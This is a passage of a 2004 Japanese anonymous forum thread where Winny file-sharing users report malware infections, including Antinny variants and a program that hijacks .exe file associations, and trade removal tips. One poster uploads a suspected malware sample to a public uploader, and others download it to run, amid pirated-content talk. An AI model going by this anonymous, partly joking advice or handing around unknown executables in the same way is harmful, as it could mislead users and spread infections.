
318 :[名無し]さん(bin+cue).rar:04/08/15 14:52 ID:VgWoaU3i
書き込む椰子はスレ全部読んでからにしる
読んでない椰子はスルーの方向で

319 :[名無し]さん(bin+cue).rar:04/08/15 15:23 ID:KAqJiR3R
おいお前ら合法スレが落ちそうだぞ。

320 :[名無し]さん(bin+cue).rar:04/08/15 16:03 ID:d+9+viyw
起動時にwinnyなんちゃらというプログラムがインターネットにアクセスしようとしている
と、ゾーンアラームがアクセス許可を求めています。
ウイルススキャンでは何も出ませんでした、これは何かの亜種でしょうか。


321 :[名無し]さん(bin+cue).rar:04/08/15 16:09 ID:F6Y04r6Y
あなたのパソコンはスーパーハッカーに狙われています。
すぐに再インストールしてください。

322 :[名無し]さん(bin+cue).rar:04/08/15 16:16 ID:pmXLqIeS
twaintec.diiうぜぇぇぇ
いつ入ってきたんだこんなの ヽ(`д´;)/

323 :[名無し]さん(bin+cue).rar:04/08/15 16:17 ID:pmXLqIeS
diiって何だ…_no

324 :[名無し]さん(bin+cue).rar:04/08/15 16:23 ID:kCNmD8HZ
ファイル名:twaintec.dll
挙動:Windowsに常駐してIEに定期的にポップアップ(データ送信)
削除法:Windowsに常駐しているのでhijack thisで削除したあと再起動

www.twain-tech.comによると、
アプリケーションの追加と削除で削除できるとされているが削除されないことあり

325 :[名無し]さん(bin+cue).rar:04/08/15 16:31 ID:pmXLqIeS
>>324
ありがとー
しょっちゅうカチカチポップアップが出てきて3日位悩まされてます(´Д`;)
アプリケーションの追加と削除にそれらしき項目は見当たらないし
twaintec.dll自体を消すだけでいいんかな

326 :[名無し]さん(bin+cue).rar:04/08/15 17:13 ID:EDAA+IXQ
ギシギシアンアンもう諦めた。再インスコしよ。

327 :[名無し]さん(bin+cue).rar:04/08/15 17:41 ID:EuVOCRWC
331 名前:番組の途中ですが名無しです[sage] 投稿日:04/08/14 09:42 ID:Kb/kuG41
>>180
作者ですが、何か?
漏れはnyユーザーじゃないぞ

357 名前:作者[sage] 投稿日:04/08/14 18:42 ID:OBTk1Z1L
>>350
.scr .com. bat. .folder .html .htm
はデフォルトでできるよ。
その他はワイルドカードで指定すれば大丈夫。
http://live14.2ch.net/test/read.cgi/news/1092296073/331,357

>>211の作者?が降臨してる

328 :[名無し]さん(bin+cue).rar:04/08/15 17:58 ID:fb1IDsEF
俺もギシギシアンアンに感染した・・・。
セーフモードにしてもシステムの復元は当然出来ないし、
開けるのは画像ファイルと.txtファイルのみ。
どうしようもないわ・・・。

329 :[名無し]さん(bin+cue).rar:04/08/15 18:02 ID:ORynGO81
ギシギシアンアンに悩まされてる人・・・システムの復元できない?
自分はできたのだけど

330 :[名無し]さん(bin+cue).rar:04/08/15 18:04 ID:9l3wwHE+
蓮壁紙のウィルスの対象方法って出た?

331 :[名無し]さん(bin+cue).rar:04/08/15 18:08 ID:y0dADdbu
>ギシギシアンアン
何それ?
略しすぎで意味不明

332 :[名無し]さん(bin+cue).rar:04/08/15 18:09 ID:kCNmD8HZ
略してないし

333 :[名無し]さん(bin+cue).rar:04/08/15 18:21 ID:fb1IDsEF
>>329さん
自分は>>328ですが、出来ないです。
通常起動では無反応ですし、セーフモードでもギシギシアンアンが起動しちゃいますね・・・。

334 :[名無し]さん(bin+cue).rar:04/08/15 18:21 ID:y0dADdbu
>ウィルス被害者
何でそんなにいろんなものをクリックしまくるの?

335 :[名無し]さん(bin+cue).rar:04/08/15 18:31 ID:VgWoaU3i
誰がいろんなものをクリックしまくりなんだ

336 :[名無し]さん(bin+cue).rar:04/08/15 18:40 ID:FyBLKeeu
実はここでギャーギャーわめいてるのは京◎府警のハイテク課

337 :[名無し]さん(bin+cue).rar:04/08/15 19:00 ID:h8dQyL72
感染した香具師は
ファイル名も書けや( ´_ゝ`)

338 :[名無し]さん(bin+cue).rar:04/08/15 19:09 ID:FOsUFrNB
デスノートばっかw

339 :[名無し]さん(bin+cue).rar:04/08/15 19:13 ID:uUq9fzsD
すなわちガキばっかということか

340 :[名無し]さん(bin+cue).rar:04/08/15 20:35 ID:F64hWfgA
夏休みでごめんなさい

341 :[名無し]さん(bin+cue).rar:04/08/15 21:18 ID:NI9tvCC0
そこにボタンがあれば押してみるのが、男のロマンだ
実行ファイルがあればダブルクリックするのは、ちょっと違う。

C66だと既知のものしかヒットしないなぁ

342 :[名無し]さん(bin+cue).rar:04/08/15 21:24 ID:RwluiYkV
>341
じゃ、押してくれ

      __
     |自爆|
       ̄ ̄

343 :[名無し]さん(bin+cue).rar:04/08/15 21:51 ID:7CQy7aU+
>>341
>>288は結局なんのウィルスだったの?

344 :[名無し]さん(bin+cue).rar:04/08/15 22:17 ID:F64hWfgA
そういや壁紙が蓮になるスクリプト(ウィルス?)の対処方法って出た?

345 :[名無し]さん(bin+cue).rar:04/08/15 22:20 ID:kCNmD8HZ
Documents and Settings/All Users/スタート メニュー/プログラム/スタートアップ/                                     .exe
を消す
壁紙を元に戻す

346 :[名無し]さん(bin+cue).rar:04/08/15 22:29 ID:F64hWfgA
        .exeがない亜種なんだけど
もとのファイルが.scrのやつ
亜種だからまだ解析されてないのかな
どっちにしろサンキュ

347 :[名無し]さん(bin+cue).rar:04/08/15 22:45 ID:5t9TaGBw
>>1-346
        i∨|/|///          ,. -,. ‐-、 、,-‐‐-、 ゝ∧∧/
      、!ゝ!      ///      ,. -' ,. '", ,` ゙ヾ ヽゝ∨
   ヾ、!`         //       /,. ,. '  /,.'{ イ/,} !i l ヾ    おて
    ゞ   ┤,-、  /  //     / ,' ' ,' i ,!ノ-リ,!ゝ,(、ヾ,ゝ    しめ
   \  イ d、  \  ∠,    ノ/ /' 'ノノ{iニニニ´',}ノ'y、ヾ.   え│
   フ   フ_  _フ__  (_     { ' ,'; ノ{'"__`ー'" ,.'-'、`,ゝ   てに
   >   '´_)  (__  <     ,!  ト'´.r',、ヾ ' ,i/ r''; i!<   やは
    )   /////  |    \    iハ ; ! { l!i! |ェ. ,'!、.゙"ノ',->   ん
   ´つ  ・・・・・  l、_ノ  ゞ、    { ソ、ヾ、´// ',``ニ´'>,   ね
   ∠        ー,‐  スヽ    } i':::. `',r'!" '"` ):.. ∠,   │
    /イ       (__ 、<.     i '!、_,. ヘ=、_,ィフ'"`ニ=='フ  │
     / ,        、ヽヾ     { 'i::;: i=-ェ;;;┴;;;ェ=彳'//イ  !!!!!
      ' イ/ハ∧/ヾ`        | l::;. !,i-!__l_l_,.!.-!-!| /,イ /レ、∧ハ∧
                     ,! : l:: il|llllllllll|lllllllllll/,'/  |ハ、、  i
                        { 、 ' i: |.ir'" /.  _,./,っ / /,' ) ,' }
                      } ', |: i.i lTT'T"|´!'.ノ/ /:/,' ,i {!、-(!-、
                     ノ ,' ,}:: !ゝ}i`コi´,!| '/ ',. ゝ、(ヽ` `
                    ´i´{ ' (::' ゙ 'J ̄},!´" ,/::."
                     `i')、!ヽ;::::::::. {::::.. /:::...:::::::::'''''  ''':::
                      ノ' '  `ー'"`ー/:::..::::::       '::::::'::

--------------------------------------------------------------------------------



348 :[名無し]さん(bin+cue).rar:04/08/15 23:52 ID:i90aS9Ij
>>347 お 省エネバージョンあったんだ ありがたく頂くよ

349 :[名無し]さん(bin+cue).rar:04/08/15 23:57 ID:5t9TaGBw
あっどうぞどうぞ。

350 :329:04/08/16 00:03 ID:PZqd4W29
>>333
F5でセーフモード選択。
「セーフモードで作業を続けるには[はい]を、システムの復元を使って
以前の状態を復元する場合は[いいえ]を選択して下さい」
というメッセージで[いいえ]

もしもこのメッセージが出ないというのであれば申し訳ない

351 :253:04/08/16 00:42 ID:Y0M/dZrW
>>305氏へ
懐石ありがとうございます。
ただ、幸いなことにとりあえず、%ProgramFiles%と以下のフォルダの一部は無事でした
(IEはフォルダは無事で[iexplore.exe]は削除、[いじくるつくーる]と[窓の手]とウイルスチェッカーのフォルダは消えてました)

こちらの状況ですが、現在ギシギシアンアンの発症を食い止めることに成功しました。
拡張子[EXE]にそのウイルスを関連付けてあったらしく

[Windows.FAQ - ウィンドウズ処方箋]
ttp://winfaq.jp/   の
[exe ファイルの関連付けを変更してしまいました]項目のとおり行うことで
セーフモード以外でもばっちりギシ^2アン^2を止めることに成功しました。

[Windowsの終了]が表示できない問題も窓の手といじくるツクールの再インストールをし
解消できました。

…が、
いまだにタスクマネージャが立ち上がってきません。
これってどうやって回復したらいいでしょう…



352 :253:04/08/16 00:51 ID:Y0M/dZrW
ただ、口惜しいことに、いきなり[Windows.FAQ - ウィンドウズ処方箋]の方法をやってしまったため
[EXE]に何が関連付けられていたかを調べることができませんでした。

私がクリックしてしまったファイルに直接関連付けられていたとは思えないので
どこかにコピーおよびリネームされたファイルが潜んでいるかもと思うと
夜もおちおち眠れません。

どなたか何が[EXE]ファイルに関連付けられていたか調べてもらえないでしょうか?


353 :[名無し]さん(bin+cue).rar:04/08/16 01:41 ID:58oTe3b7
>352
私も同じものに感染し、無理矢理プロセス名を見たら
「Gishian」でした。。orz ちなみにそのファイル名で検索を
掛けましたがやはり何もひっかからず。。
(役に立たない情報でスマソ)

354 :[名無し]さん(bin+cue).rar:04/08/16 01:42 ID:bHSPejUB
ここってさ〜、
Winnyで流れているワーム、ウイルス等の報告・調査・対処をするスレだよね。
対処できてねーじゃん、おまえら。
くそなレスしかデキネェーやつらばかりだな。


355 :[名無し]さん(bin+cue).rar:04/08/16 01:43 ID:kKk9VW+3
と、ウィルスに感染して涙目になりながら必死な厨が申しております

356 :[名無し]さん(bin+cue).rar:04/08/16 01:48 ID:PQEo+9lz
感染元ってやっぱりデスノート?

357 :[名無し]さん(bin+cue).rar:04/08/16 01:50 ID:uH1rhp8I
>>355
ワロタ

358 :[名無し]さん(bin+cue).rar:04/08/16 02:01 ID:zf08fUwo
>>355
自分に理解できないレスばっかりで、おろおろしてるんだよきっと(w。

359 :[名無し]さん(bin+cue).rar:04/08/16 02:02 ID:bHSPejUB
ウルウルTT

360 :[名無し]さん(bin+cue).rar:04/08/16 02:03 ID:mvkrd5u5
子供がこんな時間まで起きててはいかん
夜更かしは脳の発育を悪くするぞ

361 :[名無し]さん(bin+cue).rar:04/08/16 02:07 ID:WZOLI3Go
ギシギシアンアンってexeに自身を関連付けって考えたなぁ
ウィルスにゃ詳しくないから知らないが、けどよくある手なのか?

362 :[名無し]さん(bin+cue).rar:04/08/16 02:11 ID:zf08fUwo
>>359
とりあえずノートンのダウンロード版でも買え。
そこそこ対応し始めてるから、近日中に現行亜種を弾けるかもしれん。
ま、そのころには更なる亜種が出回ってるだろうがな。

363 :[名無し]さん(bin+cue).rar:04/08/16 02:12 ID:51QcBs2g
ギシギシアンアンってなんだ?
ヌルプォースとかいうトロイの木馬とは別モン?

364 :[名無し]さん(bin+cue).rar:04/08/16 02:20 ID:chyB0WBi
>>362
スクリーンセーバーのに対応するのにどれだけかかったと思ってるんだw

365 :[名無し]さん(bin+cue).rar:04/08/16 02:24 ID:FpSfKGzd
>>361
よくある手

366 :[名無し]さん(bin+cue).rar:04/08/16 02:31 ID:vgXTfbrX

【使用OS】 XPhomeSP1 
nortonAntivirus 結果 問題なし トレンドマイクロオンラインスキャン 問題なし
【Winnyのバージョン】 b2.0v7
【テンプレを読んだか】 読みました
【テンプレにある対策を実行したか】いいえ いかにも怪しいEXEを実行してしまった
【症状か具体的に、分かる限りすべて書く】
Notepadのアイコンのサイズ79,872 バイトで更新日時2004年3月21日、11:54:12のEXEを実行しました。
するとNotepadそっくりのものが立ち上がりました。メニューバーの新規作成を選択すると
ダイアログ『Notepad:メモ帳なんてひとつあれば大丈夫だろ、それくらい考えろ』とか出ます。
他のも似た様なもので保存してみたらEXEのあるフォルダに100個保存されました。
終了しようとすると『こんな便利なメモ帳終了するのかキミは、もっと使え』とでます。
タスクマネージャのプロセスの終了で終了できました。
メニューバー右端で折り返すを選択しても『何で折り返すの』『広々としてたほうがいいじゃん』などとでて
最後に『さようなら、もう起動しなくていいよ』と出てメモ帳上にも
「さようならさようならさようなら」と表示されメモ帳がタスクバーへ沈み終了しました。

【何をしたらそんなことになったのか】
「(040730) らぶフェチ フェラチオ編 NoDVDパッチ」というファイル名の書庫を解凍し
NoDVDパッチ.EXEというNotepadアイコンのEXEを実行しました。
らぶフェチやりたさに踏みました。反省しています。

【これまでにとった措置】
システムのウイルスチェック、レジストリの\RUNのチェックぐらいです。

単なるジョークソフトなのか、判断しかねるのどうかよろしくおねがいします。



367 :[名無し]さん(bin+cue).rar:04/08/16 02:34 ID:y7RKXLmu
ほかの症状はないの?

368 :[名無し]さん(bin+cue).rar:04/08/16 02:35 ID:wuLSk6N1
NoDVDパッチ.EXEというNotepadアイコンのEXE

ここでおかしいと気付けよ…

369 :[名無し]さん(bin+cue).rar:04/08/16 02:37 ID:wgJeGDhD
面白そうなメモ帳.exeだなぁ
うpしてくれよw

370 :366:04/08/16 02:42 ID:vgXTfbrX
>367 今のところなにも起こっていません。気づいていないだけなのかもしれませんが。
まだOS再起動もしていない状態です。
>368 わかってはいたんです。でもらぶフェチやりたさに脳が腐っていたんだと思います。
>369 どこかうpしても問題のないうpろだ教えていただけませんか?


371 :[名無し]さん(bin+cue).rar:04/08/16 02:46 ID:WZOLI3Go
.exeを適当な拡張子に変更(or無拡張子)にしておけばどこでもいいんじゃね?

372 :[名無し]さん(bin+cue).rar:04/08/16 02:47 ID:dAF/D5dv
>>366
この変態紳士が(・∀・)

373 :[名無し]さん(bin+cue).rar:04/08/16 02:48 ID:WZOLI3Go
> メモ帳なんてひとつあれば大丈夫だろ、それくらい考えろ
> こんな便利なメモ帳終了するのかキミは、もっと使え
矛盾してるところがいいな

374 :[名無し]さん(bin+cue).rar:04/08/16 02:51 ID:y7RKXLmu
>>370
きみが感染者第一号みたいだね。
情報が少なくてお役にたてそうにないやごめん

375 :[名無し]さん(bin+cue).rar:04/08/16 02:53 ID:y7RKXLmu
>>370
ごめん情報少なくてお役に立てないや

376 :[名無し]さん(bin+cue).rar:04/08/16 02:54 ID:y7RKXLmu
>>370
ごめん情報少なくてお役に立てないや

377 :[名無し]さん(bin+cue).rar:04/08/16 02:57 ID:y7RKXLmu
<<374-376
ごめんIEがおかしくなってた

378 :[名無し]さん(bin+cue).rar:04/08/16 02:59 ID:wgJeGDhD
そのオモシロメモ帳のサイズがどの程度の物かわからないから
↓でてきとーなとこ選んでうpしてくださいな
Aiolosの捜し物・あぷろだ登録集【ttp://www.aiolos-imgboard.com/linkv/linkv.html】

379 :366:04/08/16 03:02 ID:vgXTfbrX
うpしました。
http://49uper.com/up-s/index.php?mode=list
ここの4007.zipです。パスはsageです。
一発抜いて冷静になり、怖くなってここに書き込んだしだいです。
よろしくお願いします。

380 :[名無し]さん(bin+cue).rar:04/08/16 03:02 ID:mvkrd5u5
ていうかネタかと思ったらホントなのね。ちょっと面白かったんだけど

381 :[名無し]さん(bin+cue).rar:04/08/16 03:07 ID:wgJeGDhD
うpありがとう。早速落としてみた
まだ実行する気分にはなれないけどw

382 :[名無し]さん(bin+cue).rar:04/08/16 03:12 ID:WZOLI3Go
あ〜俺、実行してみたくなってきたw
古いPC掘り出してきて走らせてみよっかな?w
  ∧_∧
 ( ・∀・) ドキドキ
 ( ∪ ∪
 と__)__)


383 :[名無し]さん(bin+cue).rar:04/08/16 03:23 ID:Ac7B3wSe
>>366
http://www.vector.co.jp/soft/win95/amuse/se299490.html
これじゃない?

384 :[名無し]さん(bin+cue).rar:04/08/16 03:23 ID:y7RKXLmu
>>382
idがGoだぞ!行くしかないだろ!

385 :[名無し]さん(bin+cue).rar:04/08/16 03:24 ID:I/Nr+SAe
(・∀・)(・∀・)(・∀・)(・∀・)(・∀・)(・∀・)(・∀・)だって

386 :[名無し]さん(bin+cue).rar:04/08/16 03:27 ID:I/Nr+SAe
>>383
同じだね。サイズ、コンパイルされた時間も一緒だ

387 :[名無し]さん(bin+cue).rar:04/08/16 03:31 ID:WZOLI3Go
ハッシュも一致
よかったな>>366

388 :[名無し]さん(bin+cue).rar:04/08/16 03:33 ID:wuLSk6N1
Name         CRC32    Bytes
---------------  --------   ------
NoDVDパッチ.EXE D24BE608  79,872
NOTEPAD.EXE   D24BE608  79,872
---------------------------------

同一ファイルだな。



389 :366:04/08/16 03:35 ID:vgXTfbrX
よかった。やはりジョークソフトでしたか。
皆さんありがとうございました。
これで寝れます・・・



390 :[名無し]さん(bin+cue).rar:04/08/16 03:40 ID:jpirEoKy
まだny上に流れているので拾ってみた
「(040730) らぶフェチ フェラチオ編 NoDVDパッチ.rar」 87.1KB(89217bytes)
中身を確認してみたが、多分、それっぽい。

解凍後は78.0KB(79872bytes)、更新日時 04年03/21 11:54:12
アイコンはノートパッドのそれに偽装

プロパティをみると、ファイルバージョンが 「(・∀・)(・∀・)(・∀・)(・∀・)(・∀・)(・∀・)(・∀・)」
言語が「日本語」、正式ファイル名が「のーとぱっどえぐぜ」、など

バイナリエディタで内部を見る限りは、ウイルスというよりジョークソフト
MS VBA等で作成、冗長すぎるので作成スキルは低いと思われ、
IEを開いて、グーグルで特定文字列を検索させるプロセスがある。
わざわざメモ帳のウィンドウを描画して、なんかメッセージBOXにいろいろと書いてる
内部の文字列を見るにはパイナリエディタで、Unicodeで表示、00009280〜いろいろ書かれてる
「いおぐさ耀」は作者名かも.......以上。


391 :[名無し]さん(bin+cue).rar:04/08/16 03:42 ID:I/Nr+SAe
この作者ネラーだな。

392 :[名無し]さん(bin+cue).rar:04/08/16 03:43 ID:xm+/Kw9f
JokeVirus
パソコンがウイルスに感染したかのようにみせるジョークプログラム
http://www.vector.co.jp/soft/win95/amuse/se295293.html

どうせならこっちをメモ帳アイコンにして入れときゃいいのになw

393 :[名無し]さん(bin+cue).rar:04/08/16 03:46 ID:I/Nr+SAe
貼り付けしたらデスクトップに文字ばら撒きやがったw

394 :[名無し]さん(bin+cue).rar:04/08/16 03:50 ID:I/Nr+SAe
>>390
検索しようとするとグーグルに繋げやがるw

395 :[名無し]さん(bin+cue).rar:04/08/16 04:04 ID:FOFSXPdL
今回はのほほんと解決したね 結果的にexeなどは
安易に信用しては駄目ってことだね

396 ::[名無し]さん(bin+cue).rar :04/08/16 04:12 ID:UGWJBKCw
日本頑張れ!あと2点取れ

397 :[名無し]さん(bin+cue).rar:04/08/16 04:59 ID:YmgMBUFD
nyこわいなぁ・・・・

398 :[名無し]さん(bin+cue).rar:04/08/16 05:57 ID:WZOLI3Go
全消しの覚悟ができてれば怖くないよ

399 :333:04/08/16 07:45 ID:SObqrMdL
>>350さん
出来ました!直りました!
左下のスタート→アクセサリからシステムの復元を選択していたのですが、
>>350さんのとおりに、最初の選択で「いいえ」を選択で出来ました。
本当にありがとうございます。
もうHDDフォーマットしかないかな、と思っていただけに感謝の言葉もないです。
なんと言っていいのやら。このご恩は一生忘れません!

400 :[名無し]さん(bin+cue).rar:04/08/16 12:33 ID:aaxwKRUr
例の壁紙が蓮っぽいに変わる奴なんだけどタスクマネージャーは消されたっぽいからバックアップをコピったら直った
あとは本体なんだけど
ttp://venus.aez.jp/uploda/dat/upload9311.jpg
怪しいのある?

401 :[名無し]さん(bin+cue).rar:04/08/16 12:43 ID:I/Nr+SAe
>>400
バイオ捨てる。

402 :[名無し]さん(bin+cue).rar:04/08/16 12:45 ID:rTWY3Ih3
>>400の顔が怪しい

403 :[名無し]さん(bin+cue).rar:04/08/16 12:46 ID:I/Nr+SAe
>>400
ati2etvxx.exeって?

404 :[名無し]さん(bin+cue).rar:04/08/16 12:54 ID:M+qRRFxb
>>403
わかりません、検索しても出てきませんでした
msconfig内のスタートアップも掲示した方がいいですかね?

405 :[名無し]さん(bin+cue).rar:04/08/16 13:02 ID:RPvdml8G
>>403
Ati HotKey Poller

406 :[名無し]さん(bin+cue).rar:04/08/16 13:26 ID:8Pn6tIAH
【使用OS】 windows2000sp4
【WindowsUpdateしてるか】 しています
【AntiVirusは】 norton aitivirus
【ちゃんとUpdateしてるか】 しています
【スキャンした結果】
E:\RECYCLER\S-1-5-21-1645522239-854245398-839522115-1000\De1.lzh に
01.exe 0.2exe ..... 0.15.exe 16.exeまでの16個のファイルが W32.Antinny.Qに感染
【オンラインスキャンしたならその結果は】
【Winnyのバージョン】 Winny2b71
【Winny歴、総DL量は】 6ヶ月
【テンプレを読んだか】 読みました
【テンプレにある対策を実行したか】しました
【症状か具体的に、分かる限りすべて書く】
特にこれと言って何の変化も無かったのですが
半月ぶりにスキャンしたら16個検知していました。
UpFolder.txtに何か追加されていたりといことも無く
勝手にUpフォルダが作られていたりということも無く
C:\Program Files内に.見た目がフォルダのexeも無く
レジストリも改変されている様子も無かったのですが
WIN.iniに「ぬるぽ」の文字がありました
【何をしたらそんなことになったのか】
WinnyでDLした動画を再生しようとしても再生出来ないものがありました
もしかしてそれがウイルスだったのでしょうか?
【これまでにとった措置】
Norton Antivirusによる システムの完全スキャンによる検知と削除
WIN.iniから「ぬるぽ」関連の文字を削除

あまりW32.Antinny.Qの情報が無く不安だったのですが
私は既に感染してしまっていたのでしょうか?
そして これはACCSに個人情報を送るといった症状のみなのでしょうか?
見辛い文で恐縮ですが ご教授いただけたら幸いです

407 :[名無し]さん(bin+cue).rar:04/08/16 13:30 ID:adAbgo1r
動画で感染なんて聞いたことないんだが・・・

408 :[名無し]さん(bin+cue).rar:04/08/16 13:32 ID:WZOLI3Go
>>406
win.iniにぬるぽなら間違いなく感染
ただし、過去にだな
感染したのはゴミ箱中のファイルだ

409 :[名無し]さん(bin+cue).rar:04/08/16 13:36 ID:TIjR4IWg
動画での感染は、現状判明しているセキュリティホールでは考えられない。
確実にそれ以外のファイルだな、アーカイバが古かったりするんじゃないか?

まあ感染ファイル数の多さから言って、念のためクリーンインストールはした方がいいだろうね。

410 :[名無し]さん(bin+cue).rar:04/08/16 14:09 ID:q5MiUGUJ
プロセス39って…
漏れの場合にはありえない数字だ
スレ違いだけどさ、おまいらPC起動時のプロセス数っていくつ?
漏れは24

411 :[名無し]さん(bin+cue).rar:04/08/16 14:14 ID:i7sGQS9p
プロセス数36。多い?

412 :[名無し]さん(bin+cue).rar:04/08/16 14:16 ID:SeunfZrN
起動した段階では19
だからなんだって気もするが…

413 :[名無し]さん(bin+cue).rar:04/08/16 14:21 ID:KuL0wTir
51ある。

414 :[名無し]さん(bin+cue).rar:04/08/16 14:28 ID:+Bq5zvg6
これは人によって違うから多くても別に問題ないよ

415 :[名無し]さん(bin+cue).rar:04/08/16 14:30 ID:c3omb9gb
>406
まず、Antinny.Qの説明嫁。

ttp://www.symantec.co.jp/region/jp/sarcj/data/w/w32.antinny.q.html

>【何をしたらそんなことになったのか】
>WinnyでDLした動画を再生しようとしても再生出来ないものがありました
>もしかしてそれがウイルスだったのでしょうか?

先生の解析結果によれば、動画に見せかけたトロイで感染したとみるべきだろう。
hogehoge.mpg                                            .exe
でも踏んだんだろ?

レジストリのRunを再確認汁。あとwin.iniに以下のセクションがあるかも確認

>[hoge]
>hugo=<WINNY アプリケーションのパス>

416 :[名無し]さん(bin+cue).rar:04/08/16 14:32 ID:nxR8kO93
>>411
おれもそのくらいだ

417 :400:04/08/16 14:34 ID:M+qRRFxb
xpでメモリいっぱい積んでたら40近くてもいいんじゃない?
でスタートアップも見てみたんだけどどれも怪しそうなんだよな・・・
ttp://venus.aez.jp/uploda/dat/upload9312.jpg
なんかあればよろしくお願いします

418 :[名無し]さん(bin+cue).rar:04/08/16 14:39 ID:8Pn6tIAH
>>415
調べたところ それらしいものは一切見当たりませんでした
くどくて申し訳ないのですが
感染はしていないということですよね?

「ぬるぽ」は
過去にW32.HLLW.Antinnyに感染し
Nortonでウイルスを除去した時に
Win.iniは見てませんでしたから
その時の残骸っぽいですね

419 :[名無し]さん(bin+cue).rar:04/08/16 14:44 ID:EM6q3TGV
>>417
お前はここを検索エンジンだとでも思ってるのか?
全部自分でぐぐれよ

420 :[名無し]さん(bin+cue).rar:04/08/16 15:00 ID:KZJWJh9s
>>417
ヤバそうなのも有るには有るが、コマンドパスが途中で切れてるから何とも言えんな
自分で検索して対処汁

421 :[名無し]さん(bin+cue).rar:04/08/16 15:00 ID:YvIa1Nw/
各プロセスが何であるかもわからないなら、もう怪しいと思ったやつ片っ端から消してれば?
自分で調べる癖をつけろよ、坊やたち

422 :[名無し]さん(bin+cue).rar:04/08/16 17:30 ID:Us2Wzbtl
【使用OS】 Me
【WindowsUpdateしてるか】 してる
【AntiVirusは】 ノートンアンチウィルス
【ちゃんとUpdateしてるか】 スキャンする前にIntelligent Updaterした
【スキャンした結果】 成年コミック.zipにW32.AntiWinny.Kがあったので検疫駆除
【Winnyのバージョン】 2.0.0.0
【Winny歴、総DL量は】 1年 130GBくらい
【テンプレを読んだか】 読んだけどむずかしい。。
【テンプレにある対策を実行したか】 ノートンでスキャンすればいいのかな?と思ってしてない
【症状か具体的に、分かる限りすべて書く】
スキャンしたらzipにキンタマが潜んでることがわかりました。
解凍したりexeを実行したことないけど大丈夫なのでしょうか。マンガミーヤで中身を読んだことならあるけど
これでも感染するの?
ノートンでスキャンしたら検疫駆除してくれたけど安心していいの?
【これまでにとった措置】
ノートンで検疫


423 :[名無し]さん(bin+cue).rar:04/08/16 17:39 ID:+IjedQbb
>>422
その程度の知識ならnyやめたほうがいい
今感染しなくてもきっとすぐに痛い目にあう

424 :[名無し]さん(bin+cue).rar:04/08/16 17:52 ID:nxR8kO93
>>422
exeを実行してなきゃ
大丈夫じゃね

再スキャンした?

425 :422 :04/08/16 18:05 ID:Us2Wzbtl
>>423
ごめんなさい。もう本当にnyやめる。怖いよーー><
本気で辞めようと思う。。。

>>424
再スキャンしたら大丈夫でした。
Antinny対策サイトでdel_nullpo.regを実行してもWinnyフォルダの中に
うpフォルダができないから先にすすめない><
WinnyをCドライブでなく外付けHDDにいれてるから?

Winnyをフォルダごと削除したほうがいいのでしょうか?

426 :[名無し]さん(bin+cue).rar:04/08/16 18:11 ID:I1zWwVHa
nyやめんならフォルダごと削除したほうがいいにきまっちょる。

427 :[名無し]さん(bin+cue).rar:04/08/16 18:13 ID:AOllFcc4
AntiWinnyでビクついてるようじゃ
nyどころかネットを止めるべきかと。

428 :[名無し]さん(bin+cue).rar:04/08/16 18:15 ID:ePgpi0MW

http://www.itmedia.co.jp/enterprise/articles/0408/12/news038.html

Antinny.GとAntinny.Kが話題になったときだが、筆者が見たところ、
ウイルス対策企業側のパターン作成対応は明らかに遅れていた。
以前この件について尋ねたところ、
「(感染)レポートがユーザーからあまり来なかった
(≒被害の深刻度は低い≒緊急に対処する必要性が薄い)」から、という話であった。

429 :[名無し]さん(bin+cue).rar:04/08/16 18:24 ID:FEBfSu0X
(一般コミック・雑誌) [ジャンプ] [2004-33] DEATH NOTE-30.zip
c478b01d6335c9f8bc0df1f5ce3744f8

中身は米田学のアドレス帳              .exe
というファイルが入っていた。ノートンでは検出できず。
スキャンかけても反応なかったんでマンガミーヤで書庫を開いてしまった(結果開けなかった)が、感染してしまったのだろうか


430 :[名無し]さん(bin+cue).rar:04/08/16 18:30 ID:I1zWwVHa
なんで開くんだ?

431 :[名無し]さん(bin+cue).rar:04/08/16 18:33 ID:0ZBhwKdR
「ギシギシアンアン」な「声」がでて、プロセスにGishianがある・・・
偶然の一致なのか。なんか第一発見・報告者が実は製作者
だったりして。

432 :[名無し]さん(bin+cue).rar:04/08/16 18:34 ID:FEBfSu0X
いやね、落としたzip書庫(漫画)は必ずノートンスキャンかけて、安全なの確認してから漫画ミヤで開いてたんで、
今回みたくスキャン反応無し→書庫をダブルクリックしたらexe発見ていうケースはあまりなかったのよ。過信してた('A`)

433 :[名無し]さん(bin+cue).rar:04/08/16 18:37 ID:FOFSXPdL
今はDEATH NOTEが落としてはいけないファイル
先生も亜種にはおてあげだし そのうち偽装された.exe .bat .scrとかを踏んづけるよ

434 :[名無し]さん(bin+cue).rar:04/08/16 18:38 ID:M+qRRFxb
それおそらく例の蓮壁紙じゃない?
っていうかVIXとか使えよ

435 :429:04/08/16 18:41 ID:FEBfSu0X
>>434
詳細きぼんぬ

他には「desktop.ini」と「米田学のお気に入り」ってフォルダがあった。
書庫を開いただけなんで、それ以上は確認していない

436 :[名無し]さん(bin+cue).rar:04/08/16 18:43 ID:M+qRRFxb
ctr+Fで「蓮」を検索してみたら
どっちにしろ今のところ解決策無いけど

437 :[名無し]さん(bin+cue).rar:04/08/16 18:48 ID:ke6Xm4uX
過去スレ「米田学」で検索したけど、メール(outlook)に関係
してるらしい・・・、ぐらいしかわかってないね。

438 :[名無し]さん(bin+cue).rar:04/08/16 18:50 ID:nxR8kO93
ビューアでexe開けなかっただけだろ?

439 :429:04/08/16 18:51 ID:FEBfSu0X
ちなみに漫画ミヤで>>429のファイル開いた時表示されたのは、
「読み込み可能なファイルがありませんだった」。タスクマネージャも生きてるし、スクリーンセーバーも無事。とりあえず安心( ´ー`)フゥー


440 :[名無し]さん(bin+cue).rar:04/08/16 18:57 ID:8Pn6tIAH
>>407
>>408
>>409
>>415
お礼が遅れてすみませんでした
ご助言いただき有難うございました

441 :429:04/08/16 19:01 ID:FEBfSu0X
>>438
うん

442 :[名無し]さん(bin+cue).rar:04/08/16 19:09 ID:nxR8kO93
>>441
なら感染してないんじゃないか

443 :429:04/08/16 19:13 ID:FEBfSu0X
>>442
(´∀`)

444 :[名無し]さん(bin+cue).rar:04/08/16 19:15 ID:gOSWVydi
>>429

 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
                        |
       ____.____    | .__    パソコンを
     |        |        |   | |\_\  窓から
     |        | ∧_∧ |   | |  |.◎.| 投げ捨てろ
     |        |( ´∀`)つ ミ | |  |.: |
     |        |/ ⊃  ノ |   | .\|.≡.|
